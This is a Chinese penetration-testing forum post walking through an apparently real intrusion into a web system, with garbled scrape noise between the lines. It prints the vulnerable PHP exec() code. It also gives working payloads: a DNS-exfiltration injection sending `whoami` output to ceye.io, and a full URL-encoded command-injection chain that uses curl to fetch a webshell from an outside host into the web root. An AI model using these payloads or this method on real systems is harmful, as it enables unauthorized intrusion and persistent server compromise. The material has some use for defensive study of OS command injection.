中国网络渗透测试联盟
标题:
Web安全之实战通过os命令注入漏洞getwebshell
[打印本页]
作者:
admin
时间:
2022-3-31 01:39
标题:
Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、
) g6 n+ h! \* e( Z( O) n
** **寻找突破口**
; ^! r4 ?7 I* Z o4 |7 O
7 G4 Z' D v* d9 ^: t" g; \
**经过右键查看源代码发现系统的特征为:images/select_bg.png,去钟馗之眼搜索如图:**
, e; M8 W ^9 ^- W2 c4 K
7 K" [, J" @2 n( P+ l: m% \
![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
^% k0 F4 c# M
1 S$ s- d! r( i2 I: A/ Z% C$ t
! X) s- U0 ~8 _- q" Q
8 m" A, [. S8 N
**发现reporter和[Technology,
2 ?, g# K& W: z0 j
Inc.](
https://www.zoomeye.org/searchRe ... title:%22Technology
,%20Inc.%22&t=all)都采用这个特征,然后一看之前搞过这样的系统,有源代码,对照源代码目录发现了未授权访问页面。**
) h, J) _- N ]& L4 P q
8 p8 O- z+ v$ a& Y4 u6 n
**地址为:**
) x$ k: g8 o+ W4 } [! O
3 w( D, F- j" x; \3 ^
[
http://1.1.1.1//view/systemConfi ... ;text_packetsize=64
](
http://1.1.1.1/view/systemConfig ... ;text_packetsize=64
)**,如图:**
. O- R% z: E) k) ?5 G, A' o
; g; H, h! K( l: p
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
! |7 z+ x, t% j2 Z. c1 y3 N
2 ?$ p7 s/ q* ]4 q, O d: G
v( B( q7 j2 m4 s1 ]3 ]" h3 Q& c% D
4 p* P+ I5 M* N" {
**测试ping这里的功能,发现可以绕过ping正常功能执行命令,payload为:**
( e" q0 O! I0 k" N f
; e. N% U% ~6 S
**`whoami`.1111.ceye.io** **,如图:**
9 M! T, A2 H2 Z9 e2 O! R
0 x7 d( I V8 s) L* h1 B0 c
![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
# @. m6 c0 y3 e; ]( e( i
1 Y5 R, h2 @5 {
5 V$ Q2 D+ c4 [( a5 F8 O
# s2 O7 H6 H Y, E# Z7 q& R5 a
**返回dns记录如图:**
: z3 ~" ~ d' [4 o3 L0 J+ _0 Y
% S- ~5 i5 U, O& Y7 Z
![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
! Q: r9 s, W. j
" a# k: b. W4 g0 ?& z
' |& V8 C0 @6 K
7 ^/ t8 ~7 x* s6 L- ~: m8 z
**发现当前用户权限为root**
; f, r3 r; P+ r( K$ v( D* @
. u1 ?4 g6 u# e% A3 f
**一、
) j+ |+ G' \+ r! d+ A$ e+ _5 ~
** **通过漏洞组合getwebshell**
$ `- s# v X5 P; \3 K- H9 z& p2 F
) ? J @/ t# M& a* @; v
** ** **文章就按照挖洞顺序往下写,紧接着执行pwd命令获取web路径,如图:**
/ t3 M# L/ R% z
, {: C; d% \, j% ~1 f7 \
![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
* W' T# C0 D/ @
4 K9 x: M( K0 D: T
' v5 w H0 c, b6 X% O* M0 H
: }+ n+ v) M; }0 ?6 u' Z+ k- a
**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**
1 x, ]; J; [4 V
0 E( [, K+ ~: h# F) k8 U f g; q6 @
**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**
; g5 W+ a6 g. J% \5 x K
K& L0 w6 k# j6 d) E8 L
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
Q; E$ e$ m# z) ]2 |4 [
" \* a( g) u3 Z! i
**Os** **命令注入存的处为:/var/www/html/view/Behavior/toQuery.php,这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的,通过任意文件查看漏洞,我们读取一下源代码**
9 P$ R" |* T3 J8 G9 Y
) A9 q2 w; z! K# S1 I! e6 P
![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")\
3 z6 Z Y I1 U$ A* J
1 x8 p; i! m8 @) K* ~
$ l+ r( \" @+ R: d8 G E
**源代码为:**
+ V1 M: ]/ Y" m8 F T7 t" E
* c6 G' k7 i: w R: U7 y
<?php
" H/ L* x4 G C& e0 M) v
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
. E* p) j' L' H
?>
& y. g5 D( ]+ @. X* T( T
5 q: {* Q+ ?+ [/ e
<?php
# k$ H2 u* Y8 y
% s/ v: ^4 S2 Q* D& y
2 {2 R: D' ]' _
7 I9 R* Q- v( p. z# ^
session_start ();
5 {: B' o5 x$ O9 v: Y* X5 Q
& t( D n4 `6 Q
) G2 Q0 B; y; z
+ s4 n* k0 u, e6 V
- Y# i! ^3 `1 I8 d* [0 f( Q/ W
$ G- S1 W: a f& C
. f% l6 l: L3 ^6 ~% e& I3 g
, V z! Y/ T( N5 h$ E
if ($_GET ["objClass"] == "")
' o' M2 r+ D9 l! ~ @, p3 l
( \/ U9 q3 u1 \+ b" K2 N
+ a4 A1 r. D! u* v' G
4 `/ ?9 ]: p8 v Y; V. F+ j" V
exit ();
# L/ X# h( P% I1 q9 N1 T9 x D
# H+ G T" c0 z2 ?
* n1 Z+ C, b& N5 P/ ?: j
2 a% X4 S0 s; e3 r
$param = $_REQUEST;
f7 ~0 F( U# n1 M
k. N v! Q$ }0 x
7 R( E5 v9 d1 _. `( w3 ?2 o; [' \
! R: \/ n& I5 D% A& c3 I; l
T) q: b* ~/ K/ q5 R! M
/ ~7 p1 P0 K6 H9 `
+ c; g& u$ z8 ~2 m/ r: l
2 t) L; L. p7 K; y3 C1 y2 u& ~
//echo "\n--------------------------\n";
0 O% |: m- M+ x: P$ e2 [
3 J% u, z2 q; s" I! N3 d
6 H2 p. i8 z1 U0 f h3 W
# \: j6 e4 w0 I, [. o1 v+ t6 d
//print_r($param);
2 p0 O' T9 T$ r& e
1 W; }% h" Y% @9 {+ b# ?1 k
/ I" V3 Z' u3 c( O8 A" p- T
S! I+ J5 M4 {3 j, C m8 C
//echo "\n--------------------------\n";
4 w8 r/ Q. s o# I$ z: r: H! c
6 W& a& X9 u% z, }
% [( }$ ]% g. k* M$ b
0 r* c$ K1 S6 \7 q' g* N) d5 t
[if ($_GET ["method"] ==
$ U& R! R) K. n5 F' S
"getList" || $_GET ["method"] == "import" ||
& o6 L, {! o# B, i6 {" x0 d
$_GET ["method"] == "processAlarm") ](){
K/ r, E# X" b; ~7 O
0 d* {- i9 J. |
4 C8 |9 x1 q$ o9 O1 U
% |- S9 R% x+ ~8 |( h a
$param
`4 I) P8 e+ @, t' B1 U
["user"] = $_SESSION ["s_userName"];
3 d% [1 b5 N: @, O4 l+ w D
" b* Z# N- N- D
+ N t* S6 K/ d6 n. l: t" V' `, ^4 P
) p- b5 B, b7 o
$param
6 }) l" h( L* C% S; e
["lan"] = $_SESSION ["lan"];
( I X; T. j! Y; H
2 ~3 J I3 `/ ~
; C$ _. F! s* e. [# \' E$ Q
( {2 h: B. a0 H1 i) s& a4 Z2 s
$param
0 J3 w% l4 o/ c# ^% ` ]8 {8 D
["regUserpath"] = $_SESSION ["regUserpath"];
; R( [, w& `2 r$ M( T7 O/ ~3 r
7 o9 p2 e c. v' M) j, @/ k M
) k$ Q/ w% l5 c1 ]8 `! }
4 V v [: H7 J$ w
6 [3 p, d6 H9 ]- u; J
& U+ B2 }# g4 [) D- r9 b
2 }) y5 F. U0 P. K
% }7 n6 _( M: c0 G- v
exec (
4 b9 e q. S& R3 W" ~
"rm -rf /tmp/cache" );
9 h) R3 Y- |1 q. _/ d
8 D+ U7 L R+ e, X; P
) l/ H7 p8 W3 V& [
/ r) q' J7 k" b* u) I, v" l
[$cmd = "/usr/local/php/bin/php ".$_SERVER
1 i! |# ~! a$ B4 |( H; i! z
["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()
) ~# D' }; j( F; t& X
+ Q! A* k) V2 c1 x% t9 w& G
" Q* h: u* J6 C9 A% L4 _/ [& [
6 ~' t0 m6 e- e
$cmd .=
7 m; r( Q8 @% y
" " . $_GET ["objClass"];
8 l. a5 ^5 d" ~6 v+ ]/ d
- ]* J0 Y1 {8 [3 D* w
" G( R+ }# {8 f* z
3 f" V' y% W1 O# c, I
$cmd .=
6 U' j4 c% v v# v& P& [
" " . $_GET ["method"];
. p% g; Q$ O& ^$ \2 L9 R. k
$ D" z5 j9 X* F6 e! ]3 |* f% z, W
- B! T) A! z) c
9 b& \& z! u) j& S; q) i m
$cmd .=
1 h& w# ` [0 l$ W4 o
" " . base64_encode ( json_encode ( $param ) );
' U8 i6 k# S$ d! j' Y
. C% b. {3 y+ J5 s) v5 U) } s4 f
6 E9 ^. n5 \8 z) D% N
" Z) T: Z( P0 Z% {6 S1 n4 W+ W
[file_put_contents("/tmp/query_cmd",$cmd);]()
m+ h7 ~5 O$ z z' @: K
) r! ]/ s7 z. x! _
. t3 ^) i0 x" v
, k4 |$ N# G I6 d0 g& l
exec ( $cmd . "
8 |1 c- Q: r/ n2 y4 y9 n5 X Q
> /dev/null &" );
4 U0 ]# j. }; ~1 l' \4 |# v7 U0 A3 _( Z
+ Z8 D6 P: t6 Y4 H
$ s6 @7 h: C6 m# ~3 z" j8 B
; f7 k/ z& S3 L( Q1 z, N
! I; c; X, P" I1 |6 ^! _
$ W2 }6 S4 B. [& I1 |# }
} else {
9 J' ?, D w8 w: m! X2 W7 V2 m
- h, W( E; ?; b9 @
' d: q+ C# i; J {
: `4 V4 O( B5 i
require_once
# r+ i# e& `* ~( F. O, U
($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
9 u- E4 w- `. q) U ^
2 j2 ]" A9 Z1 k w
6 Y* z/ B8 [8 n
$ Q0 p6 E: V1 }
$obj = new
4 F( W5 C o" i* ?0 S; H! r
QueryInterface ();
9 ?! T* i2 U% x4 v% K* g+ U
1 m7 D; U! p4 v6 z" f
N; Q r: C: d& R n* c- A$ W Q
( z, j' K+ Z/ v7 e, W
$instance =
3 @) [9 K( A( I$ M
$obj->getInstance ();
9 t/ S' k6 t0 i5 [7 [! {+ z6 a: p
% q& ^ C) N3 z: i* _) U7 R
$ g7 _( t/ N% M- m9 n+ m1 ~) o
* K) e7 r" |: z
$instance->invokeMethod
/ {9 W- K" h. Z6 ]9 T# H
( $_GET ["objClass"], $_GET ["method"], $param );
. l$ Z' j& R; s" g
7 F( w9 B, R, ~, _. d
; g. @9 i4 E; e; M" p! Q
; i3 f3 H, s; `' H) i9 N& N
}
6 l* e+ ^! ?( a9 ^- X# _
; x, n; R! v! {* _- [0 Q
1 L7 s3 G, X+ C3 F
C' w. o. ]9 E) P+ U8 x. t
exit ();
/ s' q. Y' V( T+ G
% m4 f9 m9 D; y
+ L, {" b7 B* T5 q" o
8 w% R- K& Y) p7 h: i
?>
' v/ o+ X$ e L; ]' k! ^
' g. k8 I: h/ d. V5 |
**经常简单审计发现if ($_GET
& p" j3 T8 J9 Y V3 P
["method"] == "getList" || $_GET ["method"] ==
# P T, @& U8 L( S, x+ V
"import" || $_GET ["method"] == "[processAlarm]()"),如果method只要等于getList、import、processAlarm这其中一个,$cmd =
0 d1 K9 t' A- ]* z; n& ?4 Q' v
"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .
4 S' G, O* r4 H/ x
"[system/behavior/behavior_query.php]()"; cmd等于web绝对路径+ system/behavior/behavior_query.php,然后file_put_contents("/tmp/query_cmd",$cmd);**
! O& Y& N% w4 B8 E- H8 @
; m( I8 p, w* k D9 h: _
** exec ( $cmd
& o: {0 Z1 \ {7 @# x3 _3 s
. " > /dev/null &" );** **给我们构造了一个命令注入的参数,这里直接造成了OS命令注入漏洞,下面看我演示**
: s' X- k' _- p% {& j# [1 r
0 r% A) n4 n& U+ U* W9 v# U
/ S2 R) c: a- d- o8 }& a
![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
& l( f2 H8 O6 _
- {, }0 p7 S, a8 C2 V, Z
, D: N" g6 r( J- ?' b1 k
' Y9 z" u& V/ b' Q. [
**图中objClass=存在OS命令注入漏洞,我之前试图通过bash反弹shell,但是测试了一晚上没反弹成功,最后选择了curl下载webshell,payload如下:**
4 }% N% j1 F, b2 |+ M& ~
" [* f9 o5 O& \8 v& w2 H- E; m7 n
**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**
5 p! n2 L0 ]( F/ C( [' q2 ^
e- e) H- e4 d5 o8 D7 d
**我们用url解码如下:**
" n0 A& Z# K5 {3 J7 @1 Q
! H! P2 x2 I5 e B- E( H6 I) j
**|curl
http://1.1.1.1/qYCwxRz1.zip
-o
5 F" Q: e- `: Y/ f. D
/var/www/html/images/suiji2.php||`pcurl
http://1.1.1.1/qYCwxRz1.zip
-o /var/www/html/images/suiji2.php` #' |curl
http://1.1.1.1/qYCwxRz1.zip
-o
6 c& {5 j" M, p0 ^( A* s" Y7 _: N
/var/www/html/images/suiji2.php||`curl
http://1.1.1.1/qYCwxRz1.zip
-o /var/www/html/images/suiji2.php` #\" |curl ** [**
http://1.1.1.1/qYCwxRz1.zip
-o /var/www/html/images/suiji2.php**](
http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php
)
" T2 C9 X6 F4 s9 g n
: G* X* _* ^# i$ c$ z6 W
**使用这么多管道符|就是要闭合payload,最后成功curl下载webshell如图:**
/ n% j4 R; D9 Z$ R
) g; `& Y4 E. i8 c# r* T3 `
. D, k( a8 ?+ k8 |% e. N
![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
& E0 \- }4 f) z9 Y! W, H+ Y/ s2 e
' K3 f/ j! K: P! U" x
# {# L5 _* f& S# ]( `" l5 k
3 B( |/ a5 W. |6 F4 S# g
' L$ f! S. `6 |# }/ o" q* p4 t
**三、总结**
! h! [# A7 G( Y# d
) J8 L$ @% Z Z) B
** ** **案例之所以最终获得webshell,很大程度上是取决于几个漏洞的组合,首先通过右键查看源代码找到目标系统使用的系统,因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面,通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径,其次,使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计,经过确认存在此漏洞,最后构造os命令执行payload,最终getwebshell,整个getwebshell过程就是一个漏洞的连环组合,渗透更多的时候是靠运气,如果这几个环节有一个环节漏洞不存在或者没挖到,可能导致getwebshell失败。**
9 `6 n/ X( T! t% I. q/ e9 w
9 y* Y. B1 `/ t% u
** ** **综上所述,运气与挖洞功底同等重要,谢谢观看** **! **
5 j2 B' G, S6 A' b
[/md]
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2